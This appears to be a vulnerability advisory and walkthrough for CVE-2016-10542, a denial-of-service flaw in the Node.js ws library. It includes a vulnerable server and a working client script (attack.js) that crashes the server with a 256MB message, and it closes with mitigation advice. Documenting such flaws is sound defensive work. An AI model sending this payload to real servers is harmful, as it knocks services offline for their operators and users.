DoS Due to Excessively Large WebSocket Message in ws

DoS Due to Excessively Large WebSocket Message in ws

Common Weakness Enumeration: CWE-400 (Uncontrolled Resource Consumption)

Library: Node.js ws

Vulnerability Type: Denial of Service

Affected Versions: ws 1.1.0 and earlier

Patched Versions: 1.1.1 and later

CVE-ID: CVE-2016-10542

Description

The ws library is a "simple to use, blazing fast and thoroughly tested WebSocket client, server, and console for Node.js, up-to-date against RFC-6455". Affected versions of ws do not appropriately limit the size of incoming WebSocket payloads. By sending an overly long WebSocket payload to a ws server, it is possible to crash the Node.js process, leading to a denial of service (DoS) condition.

Attack Scenario

An attacker can exploit this vulnerability by sending a very large WebSocket message to the server. Since the ws library versions 1.1.0 and earlier do not properly limit the size of incoming payloads, this large message can cause the Node.js process to crash due to uncontrolled resource consumption.

Exploit Steps

1. Set Up the WebSocket Server: The server must be running an affected version of the ws library (1.1.0 or earlier).

2. Craft a Large WebSocket Message: The attacker creates a WebSocket message that is excessively large, for example, 256MB or more.

3. Send the Large Message: The attacker sends this large message to the WebSocket server. Since the affected versions do not limit the payload size, the server attempts to process the message.

4. Server Crash: The large message overwhelms the server's resources, leading to a crash of the Node.js process, resulting in a denial of service.

Example Code

Here's an example of a vulnerable WebSocket server setup using ws version 1.1.0:

const WebSocket = require('ws');

// Create a WebSocket server
const server = new WebSocket.Server({ port: 8080 });

// Connection event handler
server.on('connection', (ws) => {
    console.log('Client connected');

    // Message event handler
    ws.on('message', (message) => {
        console.log(`Received message: ${message}`);
        ws.send('Message received');
    });

    // Error event handler
    ws.on('error', (err) => {
        console.error(`WebSocket error: ${err}`);
    });
});

console.log('WebSocket server is listening on port 8080');

Detailed Exploit Steps

1. Setup the Environment:

   • Install ws version 1.1.0 or earlier:

     npm install ws@1.1.0

2. Run the Vulnerable Server:

   • Save the provided code in a file, e.g., server.js, and run it:

     node server.js

3. Craft a Large Payload:

   • Create a script to send a large payload to the server:

     const WebSocket = require('ws');
     
     const ws = new WebSocket('ws://localhost:8080');
     
     ws.on('open', () => {
         // Create a large message
         const largeMessage = 'A'.repeat(256 * 1024 * 1024); // 256MB
         ws.send(largeMessage);
     });
     
     ws.on('message', (message) => {
         console.log(`Server response: ${message}`);
     });
     
     ws.on('error', (err) => {
         console.error(`WebSocket error: ${err}`);
     });

4. Send the Large Payload:

   • Save the payload script in a file, e.g., attack.js, and run it:

     node attack.js

5. Observe the Server Crash:

   • The server will attempt to handle the large payload and will crash, causing a denial of service.

Conclusion

The vulnerability in the ws library versions 1.1.0 and earlier allows an attacker to crash the Node.js process by sending an excessively large WebSocket message, leading to a denial of service condition. It is crucial to update to version 1.1.1 or later to mitigate this vulnerability. Alternatively, setting the maxPayload option to a value smaller than 256MB can help in preventing such attacks.